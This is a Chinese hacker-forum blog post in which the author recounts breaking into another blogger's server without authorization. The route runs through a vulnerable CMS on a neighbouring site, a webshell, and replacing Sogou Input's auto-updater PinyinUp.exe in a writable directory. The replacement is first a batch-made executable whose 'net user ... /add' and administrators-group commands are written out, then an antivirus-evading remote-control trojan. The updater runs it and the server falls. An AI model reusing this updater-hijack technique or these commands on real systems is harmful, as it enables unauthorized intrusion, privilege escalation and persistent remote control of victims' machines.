前两天检测一个牛人的博客
起因是因为我觊觎很久的网站 扔给他几分钟就搞定了 郁闷
后来我就看到他的博客
貌似z-blog 前几次搞到几个牛人的数据库 还是进不去 没有办法
TCL (太菜了)
所以看看旁站 旁站还很有几个
后来利用良精系统的拿到一个旁站
良精那套系统不晓得害了多少无辜的网站 呵呵
上去一看 ws被删了
网站目录命名也没有规则
而且要是能直接跨过去那就不是牛人能干的事情了
传.net 也打不开
貌似php也没有办法
哎到了这里 可怎么办啊
后来乱浏览 可能是运气来了 进了搜狗的目录
一般是安装在 program files\SogouInput
依次往下点 能进去 一不小心新建文件 居然新建成功
心中窃喜
安装搜狗的朋友不晓得有没有注意 是不是经常有个绿色的东西跳出来
没错 那就是搜狗的升级程序 一般都是自己升级的 文件名PinyinUp.exe
到了这里大家都应该知道怎么做了吧
我在本机试验了一下 自己制作过bat 文件
net user goingta www.hackcheese.cn /add
net user localgroup administrators goingta /add
然后把bat转为exe 改名为PinyinUp.exe 替换到自己的电脑上
像朋友要了个免杀的pc 生成的文件改成PinyinUp.exe 然后替换服务器的
替换之前请备份好PinyinUp.exe
这里我为什么要在自己电脑替换呢
这样可以实时了解搜狗什么时候更新 呵呵
剩下的就是等待了
第二天 我的电脑上突然弹出了一个cmd然后消失
呵呵 激动 高兴之余 在cmd下输入 net user 果然命令添加成功了
马上弄下端口转发 看下我的pc里面
没有上线 哎 心凉了 上旁站的shell 去看 我的PinyinUp.exe 还存在 因为大小的原因
我确定我的pc还没有运行
那就继续等吧 我把自己在电脑上的账户上了
第三天开我电脑的时候 又需要输入密码
呵呵又更新了一次吧 这个搜狗更新真的挺勤奋的
于是上webshell去看 我的PinyinUp.exe不见了
不见了是好事
打开pc端口转发下
果然上线了
哎 终于等到你了。。。。。。。
就这样 这个服务器就沦陷了 牛人博客也就这样被检测
作者:goingta
论坛:http://www.hackcheese.cn
评论